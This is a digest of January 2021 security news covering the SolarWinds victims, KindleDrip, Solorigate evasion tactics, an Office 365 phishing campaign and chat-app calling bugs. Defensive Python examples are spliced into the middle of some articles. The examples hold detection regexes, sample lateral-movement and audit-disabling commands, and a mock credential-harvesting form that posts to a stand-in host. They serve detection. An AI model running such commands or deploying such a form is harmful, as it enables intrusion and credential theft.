“Our investigation has now confirmed that this incident is related to the SolarWinds Orion software compromise and was perpetrated by the same sophisticated threat actor.” reads the update.
“Our investigation also showed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom.”
Security experts from security firm NETRESEC revealed this week that security provider Qualys was also a victim of the SolarWinds attack.
Qualys confirmed to the media that a malicious version of the Orion software infected its systems.
Below is the list of other impacted organizations shared by the experts:
central.pima.gov (confirmed)
cisco.com (confirmed)
corp.qualys.com (confirmed)
coxnet.cox.com (confirmed)
ddsn.gov
fc.gov
fox.local
ggsg-us.cisco.com (confirmed)
HQ.FIDELIS (confirmed)
jpso.gov
lagnr.chevrontexaco.net
logitech.local
los.local
mgt.srb.europa* (confirmed)
ng.ds.army.mil
nsanet.local
paloaltonetworks* (confirmed)
phpds.org
scc.state.va.us (confirmed)
suk.sas.com
vgn.viasatgsd.com
wctc.msft
WincoreWindows.local
The above list includes Fidelis Cybersecurity and Palo Alto Networks; the former confirmed the attack but pointed out that the attackers were not able to deploy the second-stage payload.
A Palo Alto Networks representative told Forbes that it detected two SolarWinds-linked incidents, which took place in September and October 2020.
“Palo Alto said its own tools detected the malware by looking at its anomalous behavior, and so it was blocked.” reported Forbes. “Our Security Operation Center then immediately isolated the server, initiated an investigation and verified our infrastructure was secure. Additionally, at this time, our SOC notified SolarWinds of the activity observed. The investigation by our SOC concluded that the attempted attack was unsuccessful and no data was compromised,” the company said.
Other security firms that were impacted in the SolarWinds supply chain attack are FireEye, Microsoft, CrowdStrike (attackers were not able to breach the security firm), and Malwarebytes (company hacked by SolarWinds attackers in a separate incident).
More Cybersecurity Firms Confirm Being Hit by SolarWinds Hack
27.1.2021 Hacking Securityweek
Cybersecurity companies Mimecast and Qualys have apparently been targeted by the threat actor that breached the systems of IT management solutions provider SolarWinds as part of a sophisticated supply chain attack. Fidelis Cybersecurity has also confirmed being hit, but it’s unclear if it was specifically targeted.
Email security company Mimecast reported a couple of weeks ago that a sophisticated threat group had obtained a certificate provided to certain customers for authenticating its products with Microsoft 365 services. The company had learned about the incident from Microsoft.
Some experts believed at the time that the incident may be related to the SolarWinds breach, and Mimecast on Tuesday confirmed that the theft of the certificate was indeed related to the SolarWinds software compromise and carried out by the same hackers.
“Our investigation also showed that the threat actor accessed, and potentially exfiltrated, certain encrypted service account credentials created by customers hosted in the United States and the United Kingdom. These credentials establish connections from Mimecast tenants to on-premise and cloud services, which include LDAP, Azure Active Directory, Exchange Web Services, POP3 journaling, and SMTP-authenticated delivery routes,” Mimecast said in a blog post.
It added, “Although we are not aware that any of the encrypted credentials have been decrypted or misused, we are advising customers hosted in the United States and United Kingdom to take precautionary steps to reset their credentials.”
SolarWinds said roughly 18,000 customers received a piece of malware named Sunburst through malicious updates for its Orion monitoring product, and a few hundred private and government organizations that represented an interest to the attackers received additional payloads. An analysis of command and control mechanisms used by Sunburst has allowed researchers to determine which organizations may have been specifically targeted by the hackers.
Based on such analysis, network forensics and security firm NETRESEC reported on Monday that one previously unidentified target of the SolarWinds hackers was information security and compliance company Qualys.
Qualys confirmed to SecurityWeek that it did find trojanized Orion software on its systems, but claimed impact was limited.
“As part of our standard research and engineering process our researchers downloaded and installed the impacted version of SolarWinds Orion software in a sandbox environment for evaluation. This sandbox environment is completely segregated from our production and customer data environments,” Qualys said. “Our security team conducted a detailed investigation and has confirmed there was no impact on our production environment.”
The analysis conducted by NETRESEC revealed nearly two dozen targets, including some major companies that have confirmed being hit, as well as several U.S. government organizations.
NETRESEC also uncovered data referencing “hq.fidelis,” which could be related to Fidelis Cybersecurity, a firm that provides threat detection and response solutions. Fidelis revealed on Tuesday that it also received a trojanized Orion update, but it currently does not believe that the attackers were able to deliver second-stage payloads. The company did not use SolarWinds products, but they were present on one machine as part of a software evaluation.
Other cybersecurity solutions providers that were targeted in the SolarWinds hack include Malwarebytes, FireEye, Palo Alto Networks, CrowdStrike, Microsoft, and Cisco. These companies either said that the attackers failed to achieve their goal or that impact was limited.
ADT Tech Hacks Home-Security Cameras to Spy on Women
23.1.2021 Hacking Threatpost
A former ADT employee pleads guilty of accessing customers’ cameras so he could spy on them.
Former ADT employee Telesforo Aviles took note when there were attractive women at a home he serviced in the Dallas area. Then he would add his personal email address to their accounts so he could have around-the-clock access to their most private moments, according to the U.S. Attorneys’ Office.
Now Aviles faces up to five years in federal prison for accessing roughly 200 accounts more than 9,600 times without consent, over a four-and-a-half year period.
“This defendant, entrusted with safeguarding customers’ homes, instead intruded on their most intimate moments,” said Acting U.S. Attorney Prerak Shah. “We are glad to hold him accountable for this disgusting betrayal of trust.”
Aviles admitted to regularly adding his own email address to customers’ ADT Pulse accounts so he could watch customers in real time without them knowing. The U.S. Attorney’s Office said Aviles would watch naked women and couples engaged in sexual activity for his own sexual gratification.
“The defendant used his position of employment to illegally breach the privacy of numerous people,” said FBI Dallas Special Agent in Charge Matthew J. DeSarno. “The FBI works with our law-enforcement partners to thoroughly investigate all cyber-intrusions and hold criminals accountable for their actions. Cyber-intrusions do not only affect businesses, but also members of the public. We encourage everyone to practice cyber-hygiene with all their connected devices by reviewing authorized users and routinely changing passwords.”
ADT was made aware of the issue on April 23, when a customer called to report an unauthorized email on their account, the company said.
“Unfortunately, our investigation revealed that during a service visit, one of our Dallas-area technicians had added his personal email address to this customer’s account to gain unauthorized access, and he had done the same thing during service visits with other customers in the Dallas area.”
ADT Reaction
As soon as the company was made aware, Aviles was terminated and reported to law enforcement.
ADT also contacted each of the customers impacted, and the company is doing what it can to address their concerns.
“We apologize to the customers affected by the actions of this former employee and deeply regret this incident,” ADT’s statement said. “The ADT mission is to help protect and connect people with the things they love most. Fully earning this trust back may take time, but nothing is more important to us and to those who have served our customers under the ADT banner for the last 145 years.”
ADT joins the ranks of many other companies dealing with insider threats on security. Ticketmaster was recently on the receiving end of a $10 million fine after several employees hacked a rival company’s computer systems.
Forrester researchers recently explained that the uptick in work-from-home and remote employees is likely to amp up the rise of insider threats across all industries.
As for ADT, the company is relieved to have this case behind them, announcing the U.S. Attorney’s decision to charge their former employee.
“We are grateful to the Dallas FBI and the U.S. Attorney’s Office for holding Telesforo Aviles responsible for a federal crime.”
Intel's Early Earnings Release Triggered by Hack
23.1.2021 Hacking Securityweek
U.S. chip-making giant Intel Corp. has acknowledged that a website hack and premature data disclosure forced the early release of its earnings report for the fourth quarter of 2020.
The Santa Clara, Calif.-based company had planned on making the earnings announcement after markets closed on Thursday, but discovered the website breach and the external disclosure of an infographic with sensitive financial information.
The discovery led to a decision by Intel to release the financial results six minutes before the market closed.
Intel CFO George Davis told the Financial Times that an infographic was leaked and the company believed hackers obtained it from its PR newsroom website. Intel is investigating the incident, but currently it does not believe the file was accidentally leaked.
Intel’s Q4 earnings exceeded expectations, which led to shares closing up nearly 7% on Thursday, but they fell back down on Friday following news of the possible hack.
“The negative impact on Intel’s finances after a hacker gained early access to earnings information from its website is, unfortunately, a sign of why data security has become a boardroom issue,” Max Vetter, chief cyber officer at cybersecurity skills platform Immersive Labs, said via email. “This is a prime example of an attack that affects the entire organization. While tech infrastructure may suffer at first, a crisis like this quickly evolves into a reputational, financial, legal and customer issue.”
Vetter added, “In practical terms, this means ensuring front-line teams are alert, incident response plans are up to date and organizational processes are primed. The ones who will respond best are the teams that have been drilling for such events far in advance to ensure that, if the worst does happen, they have the muscle memory to respond quickly and the agility to react when the unexpected hits.”
Hacking into newswire services can be very lucrative for cybercriminals and fraudsters. An operation disclosed in 2015 by U.S. authorities helped a group make more than $100 million after obtaining non-public earnings information from hacked newswires.
News that Intel may have been hacked comes just months after the company launched an investigation into a leak of source code and developer resources apparently originating from its Resource and Design Center.
Sharing eBook With Your Kindle Could Have Let Hackers Hijack Your Account
23.1.2021 Hacking Thehackernews
Amazon has addressed a number of flaws in its Kindle e-reader platform that could have allowed an attacker to take control of victims' devices by simply sending them a malicious e-book.
Dubbed "KindleDrip," the exploit chain takes advantage of a feature called "Send to Kindle" to send a malware-laced document to a Kindle device that, when opened, could be leveraged to remotely execute arbitrary code on the device and make unauthorized purchases.
"The code runs as root, and the attacker only needs to know the email address assigned to the victim's device," said Yogev Bar-On, a security researcher for Readlmode Labs, in a technical write-up on Thursday.
The first vulnerability lets a bad actor send an e-book to a Kindle, the second flaw allows for remote code execution while the e-book is parsed, and a third issue makes it possible to escalate privileges and run the code as the "root" user.
When linked together, these weaknesses could be abused to swipe device credentials and make purchases on e-books sold by the attackers themselves on the Kindle store using the target's credit card.
Amazon fixed the flaws on December 10, 2020, for all Kindle models released after 2014 following Bar-On's responsible disclosure on October 17. He was also awarded $18,000 as part of the Amazon Vulnerability Research Program.
Sending a Malicious e-book from a Spoofed Address
An important aspect of the Send to Kindle feature is that it only works when a document is sent as an attachment to a "kindle.com" email address ([name]@kindle.com) from email accounts that have been previously added to an "Approved Personal Document E-mail List."
Or that's how it ideally should work. What Bar-On instead found was that Amazon did not verify the authenticity of the email sender, and an e-book sent from an approved-but-spoofed address automatically appeared in the library with no indication that it had arrived via an email message.
But pulling this off successfully requires knowledge of the destination Kindle email address, a unique "[name]@kindle.com" address that's assigned to each Kindle device or app upon registration. Although in some cases the name is suffixed by a random string, Bar-On argues that the entropy of most of these addresses is low enough for them to be trivially guessed using a brute-force approach.
Once the e-book has been sent to a victim device, the attack moves to the next stage. It exploits a buffer overflow flaw in the JPEG XR image format library as well as a privilege escalation bug in one of the root processes ("stackdumpd") to inject arbitrary commands and run the code as root.
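The weak spot described above is an allowlist keyed on the From header, which the sender controls. The following is an added example (not Amazon's code, and not from the write-up) showing that check beside a hardened one that also requires an aligned DKIM or SPF pass for the From domain, as reported by our own inbound mail server. The allowlist, the authserv-id "mx.receiver.example" and the two sample messages are constructed for the example.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed allowlist for one hypothetical Kindle address; the real list
# lives in the Amazon account settings and is not modelled here.
APPROVED_SENDERS = {"alice@example.com"}

# Assumed identifier of our own inbound mail server. Authentication-Results
# headers stamped by any other server (or injected by the sender) are ignored.
OUR_AUTHSERV_ID = "mx.receiver.example"


def parse_message(raw):
    """Parse an RFC 5322 message from text."""
    return email.message_from_string(raw, policy=policy.default)


def from_address(msg):
    """Bare, lower-cased address from the From header."""
    return parseaddr(str(msg.get("From", "")))[1].lower()


def passing_domains(msg):
    """Domains vouched for by our own MTA's Authentication-Results header.

    A domain is returned when the header carries dkim=pass with header.d=<domain>
    or spf=pass with smtp.mailfrom=<...@domain>. Headers whose authserv-id is not
    ours are skipped, because a sender could add a fake one.
    """
    domains = set()
    for hdr in msg.get_all("Authentication-Results", []):
        authserv, _, clauses = str(hdr).partition(";")
        parts = authserv.split()
        if not parts or parts[0].lower() != OUR_AUTHSERV_ID:
            continue
        for clause in clauses.split(";"):
            clause = clause.strip()
            m = re.match(r"dkim=pass\b.*?header\.d=([\w.\-]+)", clause, re.I | re.S)
            if m:
                domains.add(m.group(1).lower())
            m = re.match(r"spf=pass\b.*?smtp\.mailfrom=(?:[^@\s]+@)?([\w.\-]+)", clause, re.I | re.S)
            if m:
                domains.add(m.group(1).lower())
    return domains


def accepts_document_naive(msg):
    """Allowlist on the From header only: the weak check the write-up describes.

    From is attacker-controlled, so a spoofed-but-approved address is accepted.
    """
    return from_address(msg) in APPROVED_SENDERS


def accepts_document_hardened(msg):
    """Allowlisted sender AND an aligned authentication pass for its domain.

    Only a DKIM or SPF pass for the From domain itself counts (the alignment
    rule DMARC uses); a spoofed From with no such pass is refused.
    """
    sender = from_address(msg)
    if sender not in APPROVED_SENDERS:
        return False
    return sender.rsplit("@", 1)[-1] in passing_domains(msg)


# Constructed sample messages (not real traffic): one spoofed, one genuine.
SPOOFED_MESSAGE = """From: alice@example.com
To: reader-device@kindle.example
Subject: convert
Authentication-Results: mx.receiver.example; spf=fail smtp.mailfrom=alice@example.com; dkim=none
Content-Type: text/plain

attachment would follow
"""

GENUINE_MESSAGE = """From: alice@example.com
To: reader-device@kindle.example
Subject: convert
Authentication-Results: mx.receiver.example; spf=pass smtp.mailfrom=alice@example.com; dkim=pass header.d=example.com
Content-Type: text/plain

attachment would follow
"""
```

The hardened check still needs the inbound server to strip any pre-existing Authentication-Results headers that claim its own authserv-id before adding its own, otherwise the sender can forge the pass.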
Thus when an unsuspecting user opens the e-book and taps on one of the links in the table of contents, the Kindle would open an HTML page in the browser that contained a specially-crafted JPEG XR image and parse the image file to run the attack code — thereby allowing the adversary to steal the user's credentials, take control over the device, and virtually access personal information associated with the victim.
Amazon has now remediated the security holes by sending users a verification link to a pre-approved address in scenarios where a document is sent from an unrecognized email address.
Software updates on Kindle devices are by default downloaded and installed when connected wirelessly. Users can head to Settings → Menu → Device Info to check if their firmware is up-to-date, and if not, manually download and install the 5.13.4 update to mitigate the flaws.
Microsoft Details OPSEC, Anti-Forensic Techniques Used by SolarWinds Hackers
22.1.2021 Hacking Securityweek
Microsoft on Wednesday released another report detailing the activities and the methods of the threat actor behind the attack on IT management solutions firm SolarWinds, including their malware delivery methods, anti-forensic behavior, and operational security (OPSEC).
The attackers, which some believe to be sponsored by Russia, breached SolarWinds’ systems in 2019 and used a piece of malware named Sundrop to insert a backdoor tracked as Sunburst into the company’s Orion product. Sunburst was delivered to thousands of organizations, but a few hundred victims that presented an interest to the attackers received several other pieces of malware and many of their systems were compromised using hands-on-keyboard techniques.
In the case of these victims, the hackers used loaders named Teardrop and Raindrop to deliver Cobalt Strike payloads.
In its latest report on the SolarWinds attack, which it tracks as Solorigate, Microsoft explains how the attackers got from the Sunburst malware to the Cobalt Strike loaders, and how they kept the components separated as much as possible to avoid being detected.
“What we found from our hunting exercise across Microsoft 365 Defender data further confirms the high level of skill of the attackers and the painstaking planning of every detail to avoid discovery,” Microsoft said.
The tech giant has highlighted some of the more interesting OPSEC and anti-forensic methods used by the hackers. One technique involved ensuring that each compromised machine had unique indicators, such as different Cobalt Strike DLL implants, folder and file names, C&C domains and IPs, HTTP requests, file metadata, and launched processes.
“Applying this level of permutations for each individual compromised machine is an incredible effort normally not seen with other adversaries and done to prevent full identification of all compromised assets inside a network or effective sharing of threat intel between victims,” Microsoft noted.
The attackers also renamed their tools and placed them into folders to make them look as legitimate as possible. Other actions and activities listed by Microsoft include the following:
Before running intensive and continued hands-on keyboard activity, the attackers took care of disabling event logging using AUDITPOL and re-enabling it afterward.
In a similar way, before running noisy network enumeration activities (such as repeated NSLOOKUP or LDAP queries), the attackers carefully prepared special firewall rules to minimize outgoing packets for certain protocols. The firewall rules were also methodically removed after the network reconnaissance was completed.
Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services.
We believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional wiping procedures and tools to complicate finding and recovering of DLL implants from affected environments.
While many of the tactics, techniques, and procedures (TTPs) leveraged by the attackers are already documented in the MITRE ATT&CK framework, Microsoft says it’s working with MITRE to ensure that the new techniques observed in these attacks will also be added to the framework.
Cybersecurity companies and researchers continue to analyze the activities of the SolarWinds hackers. FireEye this week released a white paper detailing the TTPs used by the SolarWinds hackers to target Microsoft 365 environments.
Cybersecurity firm Malwarebytes this week revealed that it too was targeted by the SolarWinds hackers — not through SolarWinds software, but by abusing applications with privileged access to Microsoft 365 and Azure environments.
Here's How SolarWinds Hackers Stayed Undetected for Long Enough
22.1.2021 Hacking Thehackernews
Microsoft on Wednesday shared more specifics about the tactics, techniques, and procedures (TTPs) adopted by the attackers behind the SolarWinds hack to stay under the radar and avoid detection, as cybersecurity companies work towards getting a "clearer picture" of one of the most sophisticated attacks in recent history.
Calling the threat actor "skillful and methodic operators who follow operations security (OpSec) best practices," the company said the attackers went out of their way to ensure that the initial backdoor (Sunburst aka Solorigate) and the post-compromise implants (Teardrop and Raindrop) are separated as much as possible so as to hinder efforts to spot their malicious activity.
"The attackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining elusive while maintaining persistence," researchers from Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC), and Microsoft Cyber Defense Operations Center (CDOC) said.
While the exact identity of the group tracked as StellarParticle (CrowdStrike), UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), and Dark Halo (Volexity) remains unknown, the U.S. government earlier this month formally tied the espionage campaign to a group likely of Russian origin.
A Variety of Tactics to Stay Undetected
Microsoft's timeline of the attacks shows that the fully-functional Sunburst DLL backdoor was compiled and deployed onto SolarWinds' Orion platform on February 20, following which it was distributed in the form of tampered updates sometime in late March.
An almost two-month-long reconnaissance period to profile its targets — something that requires a stealthy persistence to remain undetected and collect valuable information — ultimately paved the way for the deployment of Cobalt Strike implants on selected victim networks in May and the removal of Sunburst from SolarWinds build environment on June 4.
But the question of how and when the transition from Sunburst to Raindrop occurred has yielded few definitive clues, even if it appears that the attackers deliberately separated the Cobalt Strike loader's execution from the SolarWinds process as an OpSec measure.
The idea is that in the event the Cobalt Strike implants were discovered on target networks, it wouldn't reveal the compromised SolarWinds binary and the supply chain attack that led to its deployment in the first place.
The findings also make it clear that, while the hackers relied on an array of attack vectors, the trojanized SolarWinds software formed the core of the espionage operation. The tactics Microsoft lists for staying undetected include:
Methodic avoidance of shared indicators for each compromised host by deploying custom Cobalt Strike DLL implants on each system
Camouflaging malicious tools and binaries to mimic existing files and programs already present on the compromised machine
Disabling event logging using AUDITPOL before hands-on keyboard activity and enabling it back once complete
Creating special firewall rules to minimize outgoing packets for certain protocols before running noisy network enumeration activities that were later removed after the network survey
Executing lateral movement activities only after disabling security services on targeted hosts
Allegedly using timestomping to change artifacts' timestamps and leveraging wiping procedures and tools to prevent discovery of malicious DLL implants
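Several of the behaviours in this list and in the Securityweek summary above (AUDITPOL disabling event logging, temporary outbound firewall rules around network enumeration, security services stopped before lateral movement) leave traces in process-creation logs even when the attacker later tidies up. The following is an added example, not part of either article or of Microsoft's report, of detection logic run over a constructed set of Windows process-creation events (fields modelled on Security event 4688). Host names, user names, the service name "ExampleEndpointAgent" and the rule names are all made up for the example.

```python
import re
from collections import defaultdict

# Constructed process-creation events (fields modelled on Windows Security
# event 4688 / Sysmon event 1). `t` is seconds from the start of the sample.
SAMPLE_EVENTS = [
    {"t": 0, "host": "WS01", "user": "CORP\\svc_ops",
     "cmd": 'auditpol.exe /set /category:"Detailed Tracking" /success:disable /failure:disable'},
    {"t": 5, "host": "WS01", "user": "CORP\\svc_ops",
     "cmd": 'netsh advfirewall firewall add rule name="Core Net" dir=out action=block protocol=UDP remoteport=53'},
    {"t": 9, "host": "WS01", "user": "CORP\\svc_ops", "cmd": "nslookup dc01.corp.example"},
    {"t": 40, "host": "WS01", "user": "CORP\\svc_ops",
     "cmd": 'netsh advfirewall firewall delete rule name="Core Net"'},
    {"t": 60, "host": "WS01", "user": "CORP\\svc_ops", "cmd": "sc \\\\FS02 stop ExampleEndpointAgent"},
    {"t": 70, "host": "WS01", "user": "CORP\\svc_ops",
     "cmd": 'wmic /node:FS02 process call create "C:\\Temp\\stage.exe"'},
    {"t": 90, "host": "WS01", "user": "CORP\\svc_ops",
     "cmd": 'auditpol.exe /set /category:"Detailed Tracking" /success:enable /failure:enable'},
    {"t": 100, "host": "WS07", "user": "CORP\\jdoe", "cmd": "nslookup mail.corp.example"},
]

# One regex per behaviour from the report. Each is a starting point for a
# SIEM rule, not a complete signature.
RULES = [
    ("audit-policy-disabled", re.compile(r"\bauditpol(\.exe)?\b.*(/(success|failure):disable|/clear)", re.I)),
    ("audit-policy-enabled", re.compile(r"\bauditpol(\.exe)?\b.*/(success|failure):enable", re.I)),
    ("outbound-block-rule-added", re.compile(r"\bnetsh\b.*\badvfirewall\b.*\badd\s+rule\b.*\bdir=out\b.*\baction=block\b", re.I)),
    ("firewall-rule-deleted", re.compile(r"\bnetsh\b.*\badvfirewall\b.*\bdelete\s+rule\b", re.I)),
    ("remote-service-stop", re.compile(r"\b(sc(\.exe)?\s+\\\\\S+\s+stop|net\s+stop)\b", re.I)),
    ("remote-process-create", re.compile(r"\bwmic\b.*/node:\S+.*\bprocess\s+call\s+create\b|\bpsexec", re.I)),
]
IMPAIRMENT = {"audit-policy-disabled", "remote-service-stop"}


def detect(events):
    """Tag every event with the rules it matches, in time order."""
    hits = []
    for ev in sorted(events, key=lambda e: e["t"]):
        for name, rx in RULES:
            if rx.search(ev["cmd"]):
                hits.append({"t": ev["t"], "host": ev["host"], "user": ev["user"], "rule": name})
    return hits


def correlate(events, window=600):
    """Turn single hits into the sequences worth an analyst's time:
    remote execution shortly after defences were impaired on the same host,
    and the window during which the audit policy was switched off."""
    findings = []
    by_host = defaultdict(list)
    for h in detect(events):
        by_host[h["host"]].append(h)
    for host, hits in by_host.items():
        impaired_at = [h["t"] for h in hits if h["rule"] in IMPAIRMENT]
        for h in hits:
            if h["rule"] == "remote-process-create" and any(0 <= h["t"] - t0 <= window for t0 in impaired_at):
                findings.append({"host": host, "user": h["user"], "t": h["t"],
                                 "finding": "lateral-movement-after-defence-impairment"})
        off = [h["t"] for h in hits if h["rule"] == "audit-policy-disabled"]
        on = [h["t"] for h in hits if h["rule"] == "audit-policy-enabled"]
        for t0 in off:
            # The gap is a blind spot in the Security log; the process-creation
            # events that exposed it came from a source the attacker did not
            # switch off, which is the point of forwarding logs elsewhere.
            t1 = min((t for t in on if t > t0), default=None)   # None: still disabled
            findings.append({"host": host, "t": t0, "finding": "audit-logging-gap", "until": t1})
    return findings
```

The audit-logging gap is the finding to act on first: anything Security-event based is missing for that window, so reconstruction has to come from the process-creation source, from network telemetry, or from the remote host's own logs.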
Adopting a Zero Trust Mentality
"This attack was simultaneously sophisticated and ordinary," Microsoft said. "The actor demonstrated sophistication in the breadth of tactics used to penetrate, expand across, and persist in affected infrastructure, but many of the tactics, techniques, and procedures (TTPs) were individually ordinary."
To protect against such attacks in the future, the company recommends that organizations adopt a "zero trust mentality" to achieve the least privileged access and minimize risks by enabling multi-factor authentication.
"With Solorigate, the attackers took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all," Alex Weinert, Microsoft's director of identity security, said.
Hackers Accidentally Expose Passwords Stolen From Businesses On the Internet
22.1.2021 Hacking Thehackernews
A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to over a thousand corporate employees.
The cyber offensive is said to have originated in August last year, with the attacks aimed specifically at energy and construction companies, said researchers from Check Point Research today in a joint analysis in partnership with industrial cybersecurity firm Otorio.
Although phishing campaigns engineered for credential theft are among the most prevalent reasons for data breaches, what makes this operation stand out is an operational security failure that led to the attackers unintentionally exposing the credentials they had stolen to the public Internet.
"With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses: a gift to every opportunistic attacker," the researchers said.
The attack chain commenced with phishing lures that purported to be Xerox (or Xeros) scan notifications and carried an HTML file attachment that, when opened, urged recipients to enter their Office 365 passwords on a lookalike login page; the credentials were then extracted and sent to a remote server as a text file.
The researchers noted the JavaScript code for exfiltrating the credentials was continuously polished and refined to the point of evading most antivirus vendors and creating a "realistic" user experience so as to trick victims into providing their login information.
To that end, the campaign banked on a mix of specialized infrastructure as well as compromised WordPress servers that were used as a "drop-zone" by the attackers to store the credentials, thereby leveraging the reputation of these existing websites to get around security software.
Because the stolen credentials were stored in text files on these servers, search engines like Google could index those pages and make them accessible to any bad actor looking for compromised passwords with a simple search.
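The lure in this campaign is an HTML attachment that prompts for a password and ships it to a host that has nothing to do with the sign-in it imitates. The following is an added example, not from Check Point or Otorio's analysis, of a mail-gateway check that parses such an attachment and flags a password field whose form action or embedded script URL points at a host outside a short list of genuine sign-in hosts. The sample pages, the host "compromised-blog.example" and the verdict format are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts a genuine Microsoft sign-in form may post to (real hostnames);
# extend with your own identity provider if sign-in is federated.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}


class LoginFormScanner(HTMLParser):
    """Collect password inputs, form actions and URLs embedded in scripts."""

    def __init__(self):
        super().__init__()
        self.password_fields = 0
        self.form_actions = []
        self.script_urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data verbatim; pull out any
        # absolute URL the script might submit to.
        if self._in_script:
            self.script_urls.extend(re.findall(r"https?://[^\s\"'<>]+", data))


def scan_html_attachment(html):
    """Verdict on an HTML attachment: does it harvest a password off-site?"""
    scanner = LoginFormScanner()
    scanner.feed(html)
    scanner.close()
    hosts = set()
    for url in scanner.form_actions + scanner.script_urls:
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    untrusted = sorted(h for h in hosts if h not in TRUSTED_LOGIN_HOSTS)
    reasons = []
    if scanner.password_fields:
        # A password prompt inside a mail attachment is already unusual; it is a
        # harvesting page once the data leaves for an unrecognised host, or when
        # no destination is visible at all (submission hidden in script logic).
        reasons.append("password field in mail attachment")
        if untrusted:
            reasons.append("credentials sent to untrusted host(s): " + ", ".join(untrusted))
        if not hosts:
            reasons.append("no visible destination for the credentials")
    suspicious = scanner.password_fields > 0 and (bool(untrusted) or not hosts)
    return {"suspicious": suspicious, "reasons": reasons, "untrusted_hosts": untrusted}


# Constructed lookalike page modelled on the campaign's description (not a
# real sample): a fake Office 365 prompt posting to a compromised blog.
SAMPLE_PHISH = """<html><head><title>Xerox Scan - Sign in to Office 365</title></head><body>
<form id="login" action="https://compromised-blog.example/wp-content/uploads/store.php" method="post">
  <input name="email" value="victim@corp.example">
  <input type="password" name="pw" placeholder="Password">
  <button type="submit">Sign in</button>
</form>
<script>
  var dropZone = "https://compromised-blog.example/wp-content/uploads/store.php";
</script>
</body></html>"""

# Constructed benign notification: no credential prompt at all.
SAMPLE_BENIGN = """<html><body><p>Your scan is attached.</p>
<a href="https://docs.corp.example/scans/1234">Open document</a></body></html>"""
```

Treat the verdict as one signal among others: the same parser can also feed the list of untrusted hosts into an allow/deny review, and a hit on an indexed drop-zone URL is a prompt to notify the site owner as well as to block the domain.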
What's more, by analyzing the different email headers used in this campaign, the researchers came to the conclusion that the emails were sent from a Linux server hosted on the Microsoft Azure platform using PHP Mailer 6.1.5 and delivered via 1&1 Ionos email servers.
"It is highly likely that the compromised IONOS account credentials were used by the attackers to send the rest of the Office 365 themed spam," the researchers noted.
To mitigate such threats, it's advised that users watch out for emails from unknown senders, lookalike domains, and spelling errors in emails or websites; refrain from clicking on suspicious links in emails; and follow password hygiene to secure accounts.
"We tend to believe that when someone steals our passwords, the worst case scenario is that the information will be used by hackers who exchange them through the dark net," Lotem Finkelsteen, head of threat intelligence at Check Point, said. "Not in this case. Here, the entire public had access to the information stolen."
"The strategy of the attackers was to store stolen information on a specific webpage that they created. That way, after the phishing campaigns ran for a certain time, the attackers can scan the compromised servers for the respective webpages, collecting credentials to steal. The attackers didn't think that if they are able to scan the Internet for those pages — Google can too. This was a clear operation security failure for the attackers."
Google Research Pinpoints Security Soft Spot in Multiple Chat Platforms
21.1.2021 Hacking Threatpost
Mystery of spying using popular chat apps uncovered by Google Project Zero researcher.
Google Project Zero researcher Natalie Silvanovich outlined what she believes is a common theme when it comes to serious vulnerabilities impacting leading chat platforms. The research, published Tuesday, identifies a common denominator within chat platforms, called “calling state machine”, which acts as a type of dial tone for messenger applications.
Silvanovich warns that this common “calling state machine” mechanism used by Signal, Google Duo, Facebook Messenger, JioChat and Mocha is ripe for abuse today and has been the common thread in a litany of past critical bugs.
For example, past bugs in the messaging apps Signal, Google Duo and Facebook Messenger, which had allowed threat actors to spy on users through unauthorized transmission of audio or video, were tied to configuration errors in the “calling state machine”. Those settings, Silvanovich said, are key to setting up simple app consent between user connections.
State Machine: Ripe for Exploit
In all, Silvanovich identified five logic vulnerabilities in the signalling state machines of seven video conferencing applications that “could allow a caller device to force a callee device to transmit audio or video data.”
While all of the vulnerabilities she identified have already been fixed, the prevalence of the errors in how state machines are implemented in these types of apps, as well as a lack of awareness of this type of bug, means that they will continue to pose a threat, Silvanovich said.
“Signalling state machines are a concerning and under-investigated attack surface of video-conferencing applications, and it is likely that more problems will be found with further research,” she wrote.
Silvanovich examined the use of WebRTC to implement videoconferencing in seven popular chat apps. In addition to those previously mentioned, she also found logic bugs in JioChat and Mocha, she said.
The vulnerabilities specific to each app already have been publicized and patched. The Signal bug, which could cause an incoming call to be answered even if the callee does not pick it up, was patched in September 2019.
The JioChat and Mocha bugs were both patched in July 2020. Both could cause the device of someone receiving a call to send audio without user interaction.
The Google Duo bug, which could cause someone making a call to leak video packets, was fixed in September 2020, while the Facebook Messenger bug, which could cause someone’s audio call to connect before he or she had answered the call, was patched about two months later.
Insecure Web Real-Time Communications
“The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent,” Silvanovich wrote. “This is clearly an area that is often overlooked when securing WebRTC applications.”
Web Real-Time Communications (WebRTC) is used in the majority of video-conferencing applications to create connections by exchanging call set-up information in Session Description Protocol (SDP) between peers, a process that is called signalling. This process is implemented by another protocol, such as WebSockets for web apps or secure messaging for messaging apps, she explained.
Each of these connections must be set up in a way that there is clear consent on both sides of the message to ensure the interaction is only exchanged between the two parties. However, applications that use WebRTC usually have to maintain their own state machine to manage the user state of the application, Silvanovich said.
